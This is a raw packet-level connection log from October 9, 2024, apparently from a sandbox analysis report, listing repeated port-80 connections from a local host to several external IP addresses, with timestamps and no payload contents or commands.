                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.238184929 CEST804976223.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.532598019 CEST804976223.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.532701969 CEST804976223.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.532716990 CEST804976223.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.532726049 CEST804976223.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.532735109 CEST804976223.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.532896042 CEST4976280192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.533463955 CEST804976223.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.533655882 CEST4976280192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:50.653062105 CEST4976280192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:51.670658112 CEST4976380192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:51.764844894 CEST804976323.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:51.765081882 CEST4976380192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:51.773004055 CEST4976380192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:51.867413044 CEST804976323.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415227890 CEST804976323.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415242910 CEST804976323.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415321112 CEST804976323.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415334940 CEST804976323.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415426016 CEST4976380192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415431023 CEST804976323.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415497065 CEST4976380192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415601015 CEST4976380192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:53.277448893 CEST4976380192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.295139074 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.390813112 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.391046047 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.398884058 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.398936033 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.398982048 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.495729923 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.495742083 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.495753050 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.495762110 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.689748049 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.689855099 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.689883947 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.689897060 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.689913034 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.690080881 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.690902948 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.691008091 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:55.901957035 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:56.919455051 CEST4976580192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.019773960 CEST804976523.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.019982100 CEST4976580192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.025243998 CEST4976580192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.120136976 CEST804976523.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.190778971 CEST804976523.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.190790892 CEST804976523.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.190805912 CEST804976523.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.191061020 CEST4976580192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.193063021 CEST4976580192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.287880898 CEST804976523.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.306124926 CEST4976680192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.600881100 CEST8049766154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.601074934 CEST4976680192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.609004974 CEST4976680192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.903904915 CEST8049766154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.904079914 CEST8049766154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.904333115 CEST4976680192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:04.118863106 CEST4976680192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.136420965 CEST4976780192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.431372881 CEST8049767154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.431696892 CEST4976780192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.442235947 CEST4976780192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.737257957 CEST8049767154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.737360954 CEST8049767154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.737552881 CEST4976780192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:06.946367979 CEST4976780192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:07.963897943 CEST4976880192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.258749008 CEST8049768154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.259082079 CEST4976880192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.267095089 CEST4976880192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.267163038 CEST4976880192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.562304974 CEST8049768154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.562395096 CEST8049768154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.562711000 CEST8049768154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.562880039 CEST8049768154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.563009024 CEST8049768154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.563169003 CEST4976880192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:09.773881912 CEST4976880192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:10.791445971 CEST4976980192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.086296082 CEST8049769154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.086540937 CEST4976980192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.092348099 CEST4976980192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.387262106 CEST8049769154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.387381077 CEST8049769154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.387667894 CEST4976980192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.389655113 CEST4976980192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.684551954 CEST8049769154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:16.503571987 CEST4977080192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:16.728497028 CEST8049770185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:16.728743076 CEST4977080192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:16.736579895 CEST4977080192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:16.961656094 CEST8049770185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:17.016904116 CEST8049770185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:17.017009974 CEST8049770185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:17.017102957 CEST4977080192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:18.240824938 CEST4977080192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:19.258646965 CEST4977180192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:19.483534098 CEST8049771185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:19.483743906 CEST4977180192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:19.491672993 CEST4977180192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:19.716675043 CEST8049771185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:19.772253990 CEST8049771185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:19.772268057 CEST8049771185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:19.772465944 CEST4977180192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:21.005753040 CEST4977180192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.023456097 CEST4977280192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.249051094 CEST8049772185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.249308109 CEST4977280192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.257788897 CEST4977280192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.257860899 CEST4977280192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.483033895 CEST8049772185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.483103037 CEST8049772185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.483211994 CEST8049772185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.483221054 CEST8049772185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.483366013 CEST8049772185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.483463049 CEST8049772185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.483589888 CEST8049772185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.538935900 CEST8049772185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.539020061 CEST8049772185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.539257050 CEST4977280192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:23.770891905 CEST4977280192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:24.788335085 CEST4977380192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:25.014311075 CEST8049773185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:25.014468908 CEST4977380192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:25.019814968 CEST4977380192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:25.245126009 CEST8049773185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:25.300543070 CEST8049773185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:25.300669909 CEST8049773185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:25.300834894 CEST4977380192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:25.302810907 CEST4977380192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:25.527506113 CEST8049773185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:30.320013046 CEST4977480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:30.414263010 CEST8049774199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:30.414439917 CEST4977480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:30.422291994 CEST4977480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:30.516395092 CEST8049774199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:30.523932934 CEST8049774199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:30.524054050 CEST8049774199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:30.524064064 CEST8049774199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:30.524180889 CEST4977480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:30.529378891 CEST8049774199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:30.529510021 CEST4977480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:31.925281048 CEST4977480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:32.942835093 CEST4977580192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:33.037070990 CEST8049775199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:33.037259102 CEST4977580192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:33.045171022 CEST4977580192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:33.139484882 CEST8049775199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:33.146883965 CEST8049775199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:33.146894932 CEST8049775199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:33.146975040 CEST8049775199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:33.147058010 CEST4977580192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:33.147125959 CEST4977580192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:33.153218985 CEST8049775199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:33.153374910 CEST4977580192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:34.549737930 CEST4977580192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.567236900 CEST4977680192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.661583900 CEST8049776199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.661902905 CEST4977680192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.669955969 CEST4977680192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.670006037 CEST4977680192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.670054913 CEST4977680192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.764147043 CEST8049776199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.764224052 CEST8049776199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.764233112 CEST8049776199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.764338970 CEST8049776199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.764461040 CEST8049776199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.764589071 CEST8049776199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.764596939 CEST8049776199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.772002935 CEST8049776199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.772012949 CEST8049776199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.772023916 CEST8049776199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.772200108 CEST4977680192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.777040958 CEST8049776199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.777240038 CEST4977680192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:37.174144030 CEST4977680192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.191704035 CEST4977780192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.285893917 CEST8049777199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.286096096 CEST4977780192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.291410923 CEST4977780192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.385585070 CEST8049777199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.392899990 CEST8049777199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.392998934 CEST8049777199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.393008947 CEST8049777199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.393352985 CEST4977780192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.395340919 CEST4977780192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.398884058 CEST8049777199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.399111032 CEST4977780192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.489653111 CEST8049777199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:43.945291042 CEST4977880192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:44.156831980 CEST804977885.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:44.157051086 CEST4977880192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:44.165530920 CEST4977880192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:44.417632103 CEST804977885.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:45.672322989 CEST4977880192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:45.924669981 CEST804977885.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:46.690129995 CEST4977980192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:46.901251078 CEST804977985.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:46.901411057 CEST4977980192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:46.909287930 CEST4977980192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:47.161245108 CEST804977985.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:48.421732903 CEST4977980192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:48.673243999 CEST804977985.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:49.439296007 CEST4978080192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:49.650001049 CEST804978085.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:49.650146961 CEST4978080192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:49.658235073 CEST4978080192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:49.658308983 CEST4978080192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:49.869158030 CEST804978085.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:49.869323969 CEST804978085.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:51.171127081 CEST4978080192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:51.422194004 CEST804978085.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.189063072 CEST4978180192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.400229931 CEST804978185.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.400445938 CEST4978180192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.406431913 CEST4978180192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.620397091 CEST804978185.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.620735884 CEST4978180192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.622709990 CEST4978180192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.833431005 CEST804978185.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:57.981786966 CEST4978280192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.107831001 CEST8049782176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.108103991 CEST4978280192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.115968943 CEST4978280192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.241934061 CEST8049782176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.385385990 CEST8049782176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.385426044 CEST8049782176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.385647058 CEST4978280192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:59.622417927 CEST4978280192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:00.639991999 CEST4978380192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:00.766917944 CEST8049783176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:00.767126083 CEST4978380192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:00.775222063 CEST4978380192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:00.902276993 CEST8049783176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:01.048105001 CEST8049783176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:01.048118114 CEST8049783176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:01.048255920 CEST4978380192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:02.278064013 CEST4978380192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.295643091 CEST4978480192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.422012091 CEST8049784176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.422174931 CEST4978480192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.430509090 CEST4978480192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.430572987 CEST4978480192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.556350946 CEST8049784176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.557254076 CEST8049784176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.694143057 CEST8049784176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.694169044 CEST8049784176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.694348097 CEST4978480192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:04.933696032 CEST4978480192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:05.951311111 CEST4978580192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.079746008 CEST8049785176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.079936981 CEST4978580192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.085262060 CEST4978580192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.212316036 CEST8049785176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.348920107 CEST8049785176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.348932028 CEST8049785176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.349059105 CEST8049785176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.349276066 CEST4978580192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.351234913 CEST4978580192.168.11.20176.57.64.102
